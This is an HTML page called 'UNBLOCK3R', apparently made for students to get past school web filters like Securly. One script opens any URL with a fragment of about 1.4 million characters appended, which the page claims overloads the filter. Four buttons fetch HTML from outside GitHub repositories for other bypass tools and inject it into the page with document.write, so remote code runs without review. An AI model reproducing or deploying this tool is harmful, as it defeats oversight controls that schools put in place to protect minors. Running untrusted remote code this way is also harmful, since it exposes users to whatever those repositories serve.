<!DOCTYPE html> 
<html>
  <head>
    <title>UNBLOCK3R</title>
    <link rel="icon" href="https://cdn4.iconfinder.com/data/icons/vectory-personnel-2/40/user_unblock-512.png" type="image/png">
    <style>
      h1 {
        font-family: 'Helvetica', sans-serif;
      }
      p {
        font-family: 'Courier', Courier, monospace;
      }
      button {
        border-radius: 5px 15px 5px 15px;
        height: 30px;
      }
      button::hover {
        border-radius: 15px 5px 15px 5px;
        height: 30px;
      }
      input {
        border-radius: 5px;
        height: 30px;
        width: 500px;
      }
    </style>
  </head>
  <body>
    <h1>UNBLOCK3R</h1>
    <p>Made by schoolexploitkid <br>Unblocks websites by making urls too long and overloading servers.</p>
    <input id='url' placeholder='Search Google or Type a URL'>
    <button onclick='openurl()'>Open URL</button>
    <br>
    <br>
    <p>If this does not work for you, try one of the options below.</p>
    <button onclick = "launchis()">INSECURLY (For Securly, Made By Bypassi)</button>
    <br>
    <br>
    <button onclick = "launchdns()">CauDNS (All Blockers, Made By dragon731012)</button>
    <br>
    <br>
    <button onclick = "launchde()">Dextensify (All Blockers, Made By ading2210)</button>
    <br>
    <br>
    <button onclick = "launchhang()">ExtHang3r (All Blockers, Made By Blobby-Boi)</button>
    <script>
      function openurl(){
        var url = document.getElementById('url').value;
        var string = 'knm43k2643643kj643k3lkj4621642lkj326lkn632632632lk632lk11632lkj6326326326621ckjl2xkj32c';
        var urltoopen = "";
        if (url.startsWith('https://') || url.startsWith('http://')) {
          window.open(urltoopen + url + "#" + string.repeat(16380));
        } else {
          window.open(urltoopen + "https://google.com/search?q=" + url + "#" + string.repeat(16380));
        }
      }
      function launchis(){
        fetch("https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/refs/heads/main/bypassi.html")
      .then((response) => response.text())
      .then((text) => document.write(text));
      }
      function launchdns(){
        fetch("https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/refs/heads/main/cauDNS.html")
      .then((response) => response.text())
      .then((text) => document.write(text));
      }
      function launchde(){
        fetch("https://raw.githubusercontent.com/ading2210/dextensify/refs/heads/master/main.html")
      .then((response) => response.text())
      .then((text) => document.write(text));
      }
      function launchhang(){
        fetch("https://raw.githubusercontent.com/Blobby-Boi/ExtHang3r/refs/heads/main/index.html")
      .then((response) => response.text())
      .then((text) => document.write(text));
      }
    </script>
  </body>
</html>
